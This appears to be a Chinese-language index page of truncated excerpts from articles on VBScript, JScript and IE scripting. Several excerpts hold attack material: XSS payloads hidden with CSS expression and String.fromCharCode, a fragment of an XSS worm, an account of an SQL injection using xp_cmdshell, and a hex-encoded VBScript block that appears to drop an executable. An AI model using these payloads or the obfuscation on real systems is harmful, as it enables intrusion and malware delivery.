其他

//MSDN Randomize 為了產生某個範圍內的隨機整數，可使用以下公式：Int((upperbound - lowerbound + 1) * Rnd + lowerbound) 這裡，upperbound 是隨機數範圍的上限，而 lowerbound 則是隨機數範圍的下限。 ---- 在VB中的隨機函數是Rnd，但在使用的過程中發現，雖然程式啟動後產生的數值是隨機的，但對於每次重新啟動，程式都會產生相同的隨機數序列，應該怎樣解決？ ----VB中隨機函數的原形是:

expression這個CSS的屬性很多程式都沒有過濾好,很容易被跨,不知道用就參考劍心的幻影論壇跨站指令碼漏洞測試過程. 我這裡要說的是另外一種方法,使用String.fromCharCode方法把ASCⅡ碼轉換為字元再用EVAL函數執行. <img src="#" style="Xss:expression(eval( String.fromCharCode(100,111,99,117,109,101,110,116,46,98,103,67,111,108,111,114,61,3

有同時要用一個CAE軟體調用外部程式,但是,通過這個CAE軟體調用外部程式以後,因為這個外部程式有參數,調用方法寫在Bat檔案裡的,由CAE軟體來調用這個Bat,所以,CAE軟體沒辦法對調用的程式進行監控,調用的程式還在運行當中,準備工作還沒完成,就到了下一流程,所以,造成流程出錯,我寫了兩個VBS代碼,通過它來調用就解決了這個問題!兩個小程式分別是按不同的方式來監控的! 兩個程式的調用方式不一樣，一個是對系統進程進行監控，一個是對程式產生的檔案特徵進行監控！ 第一個:

文章作者：茄子寶 資訊來源：邪惡八進位資訊安全團隊（www.eviloctal.com） 看到夢之光芒放出來了!我也不藏了! 10月7日的時候我就發的日誌,提示了大家!這裡算是上次發的XSS WORM初嘗試的續吧. 其實很簡單,就是兩次轉碼. <DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/

VBS應用- - VBS指令碼病毒的大量流行使我們對VBS的功能有了一個全新的認識，現在大家對它也開始重視起來。VBS代碼在本地是通過Windows Script

記一次巧妙的hacking~ by netpatch 那天，正在看資料，朋友丟了個URL過來，說是SA注入點，但資料庫和WEB分離的，搞了半天沒搞定。 我一聽，SA注入點，應該很容易的說，於是就很隨意的說，OK，沒問題，等會給結果~ 手工大概的判斷了下，的確是個SA注入點。判斷過程偶就不寫了，精彩的地方當然要留到後面啦 操起NBSI這把大刀就開工了。首先嘗試恢複xp_cmdshell和sp_OACreate兩擴充儲存,恢複後用兩擴充儲存隨意執行了一個命令，但是從回顯結果來判斷，

20070225發布最新版PageBatchEdit：大小：78K20070301更新添加自動以網頁標題作為關鍵字及描術內容，並在此前後隨意添加附加常值內容；Windows98\XP所需 NET Framework Version 1.1

在使用部落格園的編輯器編輯文章時，有一個挺體貼使用者的功能，就是如果使用者進入編輯器後，不是執行"POST"操作而要退出當前編輯器頁面，我們會得到一個Alert視窗提示（如）。這個功能其實很簡單，就是通過處理window、body或frameset對象或元素的onbeforeunload事件實現的。

當我們在IE中使用IE提供的DOM時，我們會發現關於style的相關屬性有三個分組，它們分別是style、runtimeStyle和currentStyle。關於這個三種style的作用和基本用途，我曾經在這篇文章中有講過，但隨著越來越深入的使用，總算對怎麼使用runtimeStyle屬性有了一些自己的心得。

資料結構的問題相當重要，如果你能描述出一個問題的輸入和輸出資料結構，那麼這個問題就大有希望，資料結構並不是C語言的專利，真正的資料結構是虛擬碼的。下面這個棧類是我以前搜集別人的代碼，實際上每當考慮一個程式問題的時候，尤其是複雜的程式，就應該想到，用什麼樣的資料去描述你的輸入和輸出。 '********************************************** ' vbs棧類 ' push(string)進棧 ' getTop取棧頂元素

在使用指令碼統一處理一批頁面的時候，我希望通過被處理頁面的TITLE元素取到文檔的標題和我自訂的一些屬性。這些附加的屬性是我在伺服器端通過Attributes集合添加的，可是啟動並執行結果和我的期望老是相去甚遠，怎麼我在TITLE元素裡寫入的自訂屬性老是空值呢？ 客服端和伺服器端代碼分別是： ASPX: <title id="title" runat="server">Query Info</title> C#: protected

由於Windows XP的補丁SP2，對IE6的安全性也做了很多的提升，使得有不少原來我們可以使用的功能，會變得很奇怪甚至歇菜掉:(。特別是快顯視窗、模態視窗和Popup視窗等受的影響相當大。那麼我能不能判斷使用者使用的IE6是普通IE6(IE6sp1)還是IE6+xp sp2呢？ 下面是兩個比較典型的IE6瀏覽器UserAgent欄位： 1、Windows XP + SP1 (NT 5.1)Connection: Keep-AliveAccept:

文章作者：xiaolu [BST] 資訊來源：邪惡八進位資訊安全團隊（www.eviloctal.com） 這個不是exe2vbs 所有類型的檔案都可以轉化的 不過限於string的大小 檔案不能太大 我測試過3m的檔案是可以的 將下面的代碼存為:file2vbs.vbs複製代碼 代碼如下:'Program By xiaolu 'name:file2vbs.vbs On error resume next do while 1 fname=InputBox("請輸入要轉換的檔案名稱(包括路徑)

Teleport Ultra 所能做的，不僅僅是離線瀏覽某個網頁 (讓你離線快速探索某個網頁的內容當然是它的一項重要功能)，它可以從 Internet 的任何地方抓回你想要的任何檔案，它可以在你指定的時間自動登入到你指定的網站下載你指定的內容，你還可以用它來建立某個網站的完整的鏡象，作為建立你自己的網站的參考。 如果你也和我一樣，曾想把整個網頁抓回來慢慢欣賞，如果你也曾像我一樣，費盡千辛萬苦只為了重複抓取同一網站的檔案而做一些機械性的動作，Teleport Ultra

我在前段時間介紹過IE中JavaScript指令碼Memory Leak的問題，後來在幾位熱心網友的討論下，基本認可了記憶體泄露的事實和原理。在小規模的測試case下，本來都達到了基本避免IE中指令碼的ML問題。可是近來發現只以"仔細"來防止IE中指令碼ML似乎是非常困難的一件事情，難道開始的討論有錯誤嗎？

IE提供的模態視窗，在我們製作資料錄入視窗和Wizard等功能上，有著非常不錯的應用。不過由於一些安全性上的限制，使得在模態視窗中調試指令碼變得非常的鬱悶。因為模態視窗不支援對象的選取和右鍵菜單，使得我們想察看html代碼非常的不方便。那麼有什麼辦法可以解決嗎？

<script language="VBScript"> S="2020206F6E206572726F7220726573756D65206E6578740D0A737 3733D226D64622E657865220D0A61613D226F62220D0A6161613D22 6A65220D0A616161613D226374220D0A61616161613D22636C61220 D0A6161616161613D2273736964220D0A616161616

TextRange是用來表現HTML元素中文字的對象，雖然我們平時不太常用這個對象，可是它卻在IE4.0中就已提供了。不過TextRange提供的調用方法卻都比較晦澀，那麼我們能拿它做些什麼呢？

半年前第一次做指令碼編碼的時候，由於沒有什麼使用經驗，於是在51js上詢問了一下encode指令碼和normal指令碼混用是否有什麼問題呢？結果沒有得到任何有建設性的意見，這也至少說明了兩個問題，一是沒有人在意，二是就沒有什麼問題嘛。當然我更樂意於接受後一種結果，就開始了encode指令碼和normal指令碼的混合使用。

我們知道JScript給我們提供了一個內建的數組對象Array。Array對象除了提供了constructor、length和prototype外，還預設提供了13個方法：concat、join、pop、push、reverse、shift、slice、sort、splice、toLocaleString、toString 、unshift和valueOf，可是沒有提供delete方法。